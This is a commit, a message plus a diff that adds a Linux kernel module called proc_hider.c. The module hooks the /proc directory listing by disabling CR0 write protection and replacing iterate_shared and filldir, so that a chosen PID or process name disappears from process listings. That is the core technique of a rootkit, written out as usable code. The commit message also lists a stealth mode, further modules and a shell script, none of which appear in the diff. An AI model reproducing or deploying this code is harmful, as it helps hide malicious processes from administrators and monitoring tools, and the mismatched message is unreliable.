Implement Linux kernel module with process hiding and monitoring capabilities

- Add multiple kernel modules for process manipulation
- Implement /proc directory hooking to hide processes by PID or name
- Create stealth mode to hide specific commands from process listings
- Add process explorer module for detailed process information
- Include shell script for service management integration
- Add proper module parameters for runtime configuration

1 files changed, 207 insertions, 0 deletions

diff --git a/proc_hider.c b/proc_hider.c
new file mode 100644
index 0000000..6c2d9cf
--- /dev/null
+++ b/proc_hider.c
@@ -0,0 +1,207 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/sched.h>
+#include <linux/sched/signal.h>
+#include <linux/proc_fs.h>
+#include <linux/seq_file.h>
+#include <linux/fs.h>
+#include <linux/version.h>
+#include <linux/cred.h>
+#include <linux/namei.h>
+#include <linux/uaccess.h>
+#include <linux/string.h>
+#include <linux/dirent.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Biswa Kalyan Bhuyan");
+MODULE_DESCRIPTION("Process Hider - Hides processes from listings");
+MODULE_VERSION("0.1");
+
+/* Module parameters */
+static unsigned int hide_pid = 0;
+module_param(hide_pid, uint, 0644);
+MODULE_PARM_DESC(hide_pid, "Specific PID to hide");
+
+static char* hide_process = NULL;
+module_param(hide_process, charp, 0644);
+MODULE_PARM_DESC(hide_process, "Process name to hide");
+
+/* Hook-related variables */
+static struct file_operations *proc_fops;
+static filldir_t orig_proc_filldir;
+static int (*orig_iterate_shared)(struct file *, struct dir_context *);
+static struct path proc_path;
+
+/* Function to find process by PID */
+static struct task_struct *find_process_by_pid(unsigned int pid)
+{
+    struct task_struct *task;
+    
+    for_each_process(task) {
+        if (task->pid == pid)
+            return task;
+    }
+    return NULL;
+}
+
+/* Should we hide this process? */
+static int should_hide_proc(const char *name)
+{
+    struct task_struct *task;
+    long pid;
+    
+    // First check if it's a PID directory
+    if (kstrtol(name, 10, &pid) == 0) {
+        // It's a numeric directory, so it could be a PID
+        task = find_process_by_pid((unsigned int)pid);
+        if (task) {
+            // Check if this is our target PID
+            if (hide_pid > 0 && task->pid == hide_pid) {
+                return 1;  // Hide the specified PID
+            }
+            
+            // Check if process name matches hide_process
+            if (hide_process && strlen(hide_process) > 0 && 
+                strncmp(task->comm, hide_process, TASK_COMM_LEN) == 0) {
+                return 1;  // Hide processes with matching name
+            }
+        }
+    }
+    
+    return 0; // Don't hide this one
+}
+
+/* Custom filldir function to filter directory entries */
+static int proc_filldir(struct dir_context *ctx, const char *name, int namlen,
+                         loff_t offset, u64 ino, unsigned int d_type)
+{
+    // Check if we should hide this entry
+    if (should_hide_proc(name)) {
+        printk(KERN_INFO "ProcHider: Hiding process entry: %s\n", name);
+        return 0; // Skip this entry
+    }
+    
+    // Otherwise, call the original filldir
+    return orig_proc_filldir(ctx, name, namlen, offset, ino, d_type);
+}
+
+/* Custom iterate_shared function to hook directory listing */
+static int proc_iterate_shared(struct file *file, struct dir_context *ctx)
+{
+    // Replace the filldir function with our custom one
+    orig_proc_filldir = ctx->actor;
+    // Cast to ensure it's the same type
+    ctx->actor = (filldir_t)proc_filldir;
+    
+    // Call the original iterate_shared with our modified context
+    return orig_iterate_shared(file, ctx);
+}
+
+/* Function to set up hooking of /proc directory */
+static void hook_proc(void)
+{
+    // Get the path to /proc
+    if (kern_path("/proc", 0, &proc_path)) {
+        printk(KERN_ERR "ProcHider: Failed to get /proc path\n");
+        return;
+    }
+    
+    // Get the file operations for /proc
+    proc_fops = (struct file_operations *)proc_path.dentry->d_inode->i_fop;
+    
+    // Save the original iterate_shared function
+    orig_iterate_shared = proc_fops->iterate_shared;
+    
+    // Replace with our custom function
+    write_cr0(read_cr0() & ~0x10000); // Disable write protection
+    proc_fops->iterate_shared = proc_iterate_shared;
+    write_cr0(read_cr0() | 0x10000);  // Enable write protection
+    
+    printk(KERN_INFO "ProcHider: Successfully hooked /proc directory operations\n");
+}
+
+/* Function to unhook /proc directory */
+static void unhook_proc(void)
+{
+    // Restore the original iterate_shared function
+    if (proc_fops && orig_iterate_shared) {
+        write_cr0(read_cr0() & ~0x10000); // Disable write protection
+        proc_fops->iterate_shared = orig_iterate_shared;
+        write_cr0(read_cr0() | 0x10000);  // Enable write protection
+        
+        printk(KERN_INFO "ProcHider: Restored original /proc directory operations\n");
+    }
+    
+    // Release the path
+    path_put(&proc_path);
+}
+
+static int __init proc_hider_init(void)
+{
+    printk(KERN_INFO "ProcHider: Module loaded\n");
+    
+    // Check if we have parameters to work with
+    if (hide_pid == 0 && (hide_process == NULL || strlen(hide_process) == 0)) {
+        printk(KERN_INFO "ProcHider: No hiding parameters specified.\n");
+        printk(KERN_INFO "ProcHider: Use 'hide_pid' or 'hide_process' parameters\n");
+        return 0;
+    }
+    
+    // If hiding by PID, check if the PID exists
+    if (hide_pid > 0) {
+        struct task_struct *task = find_process_by_pid(hide_pid);
+        if (task) {
+            printk(KERN_INFO "ProcHider: Will hide PID %u (%s)\n", 
+                   task->pid, task->comm);
+        } else {
+            printk(KERN_INFO "ProcHider: Target PID %u not found\n", hide_pid);
+            // Continue anyway in case the process appears later
+        }
+    }
+    
+    // If hiding by process name, report how many matching processes exist
+    if (hide_process && strlen(hide_process) > 0) {
+        struct task_struct *task;
+        int count = 0;
+        
+        printk(KERN_INFO "ProcHider: Will hide processes named '%s'\n", hide_process);
+        
+        for_each_process(task) {
+            if (strncmp(task->comm, hide_process, TASK_COMM_LEN) == 0) {
+                printk(KERN_INFO "ProcHider: Will hide matching process: PID %d\n", task->pid);
+                count++;
+            }
+        }
+        
+        printk(KERN_INFO "ProcHider: Found %d processes named '%s' to hide\n", 
+               count, hide_process);
+    }
+    
+    // Set up the hook
+    hook_proc();
+    
+    printk(KERN_INFO "ProcHider: Process hiding activated\n");
+    return 0;
+}
+
+static void __exit proc_hider_exit(void)
+{
+    printk(KERN_INFO "ProcHider: Module unloading\n");
+    
+    // Unhook everything
+    unhook_proc();
+    
+    if (hide_pid > 0) {
+        printk(KERN_INFO "ProcHider: No longer hiding PID %u\n", hide_pid);
+    }
+    
+    if (hide_process && strlen(hide_process) > 0) {
+        printk(KERN_INFO "ProcHider: No longer hiding '%s' processes\n", hide_process);
+    }
+    
+    printk(KERN_INFO "ProcHider: Module unloaded\n");
+}
+
+module_init(proc_hider_init);
+module_exit(proc_hider_exit);